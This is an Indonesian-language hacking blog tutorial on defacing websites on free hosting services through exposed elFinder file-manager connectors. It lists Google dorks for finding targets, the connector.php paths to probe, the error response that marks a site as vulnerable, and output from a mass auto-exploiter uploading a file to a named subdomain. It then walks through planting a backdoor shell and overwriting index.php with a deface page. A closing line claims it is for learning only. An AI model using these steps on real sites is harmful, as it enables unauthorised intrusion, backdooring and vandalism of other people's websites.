Cara Deface Metode Elfinder Webhost

Selamat pagi kawan di zona waktu canada dan US, gw akan membagikan tutorial dari blog GARUDA TERSAKTI 72, yang sudah sangat banyak yang menggunakan tutorial ini, disini gw menggunakan mass Exploiter dari mas Agus, Founder sekaligus CEO IndoXploit, Oke langsung saja pada tutorialnya..

Pertama kalian harus mempunyai site untuk mengupload mas Exploiternya jika tidak punya bisa menggunkan Xampp jika tidak punya bisa gunakan punya gw

Script: Elfinder Auto Xploiter [ Mass Xploiter ]
Site: Elfinder Auto Xploiter [ Mass Xploiter ]

Tahap selanjutnya kita harus mencari target, di google
Dork:
  1) site:id.ai 
  2) site:cc.vg 
  3) site:wp.lc 
  4) site:uk.ht 
  5) site:ye.vc
  6) site:website.pl 
  7) site:ws.gy 
  8) site:site.bz 
  9) site:xx.tn 
 10) site:freewebsite.biz 
 11) site:t15.org
12) site:allalla.com
13) site:vns.me
14) site:smart-hosting.info
15) site:uhostfull.com
16) site:boxhost.me
17) site:bugs3.com
18) site:tom1.net
19) site:tuars.com / site:tuars.net / site:tuars.co
20) site:freeserver.me

Tahap berikutnya kita harus memasukkan exploit untuk mengetahui vuln atau tidaknya web tersebut..

Exploit: /_file-manager/php/connector.php Atau  /file_manager/php/connector.php

Maka site.com/exploit || site.com/_file-manager/php/connector.php || site.com /_file-manager/php/connector.php

Nah jika kalian mendapatkan {"error":["errUnknownCmd"]} saat memasukkan exploit kemungkinan besar web tersebut vuln, saatnya kita masukkan pada mas exploiternya (diatas)
Masukkan semuanya termasuk exploitnya contoh saat dimasukkan ke Mas exploit
site.com/_file-manager/php/connector.php  Jika Success maka akan ada tulisan seperti dibawah ini

[+] http://vemigisyv.smart-hosting.info//_file-manager/php/connector.php 
# Upload[1] ......
# Upload Success 1... => k.php
# Coba buka di ../../elfinder/files/...

Untuk Melihatnya,contoh site.com/k.php, http://vemigisyv.smart-hosting.info/k.php
Jika sudah ke k.php kalian Upload shell Backdoor kemudian upload script deface atau tebas index mari kita pelajari..

Setelah teruploadnya shell backdoor agan harus cari biasanya Index.php lalu klik edit ubah scritp yang tertera dengan script deface agan..

Maka hasilnya seperti ini

Oke sekian tutorial mengenai Cara Deface Metode Elfinder Webhost, semoga dapat menambah ilmu dibidang hacking khusunya deface :) hanya untuk pemebelajaran tidak ada maksud mengajarkan kerusakan namun bagaimana cara kita sesudah mempelajari, memahami dapat mencegah hal deface tersebut pada web kita sendiri :)